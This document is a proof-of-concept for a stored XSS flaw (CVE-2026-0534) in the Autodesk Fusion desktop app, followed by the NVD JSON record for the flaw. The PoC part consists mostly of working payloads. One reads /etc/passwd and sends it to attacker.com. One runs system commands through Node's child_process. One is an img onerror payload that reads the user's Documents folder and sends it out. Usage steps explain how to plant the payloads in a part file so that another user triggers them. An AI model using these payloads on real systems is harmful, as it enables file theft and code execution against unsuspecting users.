CVE-2026-0534

<!-- CVE-2026-0534 PoC: Stored XSS in Autodesk Fusion --> <!-- This payload demonstrates the XSS vulnerability when embedded in a part's attribute --> <!-- Basic XSS Payload --> <script>alert(document.domain)</script> <!-- File Read Payload (reads local file) --> <script> fetch('file:///etc/passwd') .then(response => response.text()) .then(data => { // Exfiltrate data to attacker controlled server document.location='https://attacker.com/log?data='+btoa(data); }) </script> <!-- Code Execution Payload (using Node.js in Electron context) --> <script> const { execSync } = require('child_process'); // Execute arbitrary system command const result = execSync('whoami > /tmp/pwned.txt'); // Or for Windows: // execSync('cmd /c whoami > C:\\Users\\Public\\pwned.txt'); </script> <!-- Combined Payload with exfiltration --> <img src=x onerror=" const xhr = new XMLHttpRequest(); xhr.open('GET', 'file:///C:\\Users\\'+process.env.USERNAME+'\\Documents\\*', true); xhr.onload = function() { fetch('https://attacker.com/exfil?d='+encodeURIComponent(xhr.responseText)); }; xhr.send(); "> <!-- Usage: Embed this payload in a Fusion part file's custom property field --> <!-- When another user opens the file and clicks the property, the script executes -->

{"cve": {"id": "CVE-2026-0534", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:29.113", "lastModified": "2026-01-30T17:08:06.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A maliciously crafted HTML payload, stored in a part’s attribute and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process."}, {"lang": "es", "value": "Una carga útil HTML diseñada maliciosamente, almacenada en el atributo de una pieza y al ser pulsada por un usuario, puede desencadenar una vulnerabilidad de cross-site scripting almacenado (XSS) en la aplicación de escritorio Autodesk Fusion. Un actor malicioso puede aprovechar esta vulnerabilidad para leer archivos locales o ejecutar código arbitrario en el contexto del proceso actual."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:*", "versionEndExcluding": "2606.1.21", "matchCriteriaId": "00476C10-FCC9-4EDD-AE74-95A8E99806B9"}]}]}], "references": [{"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}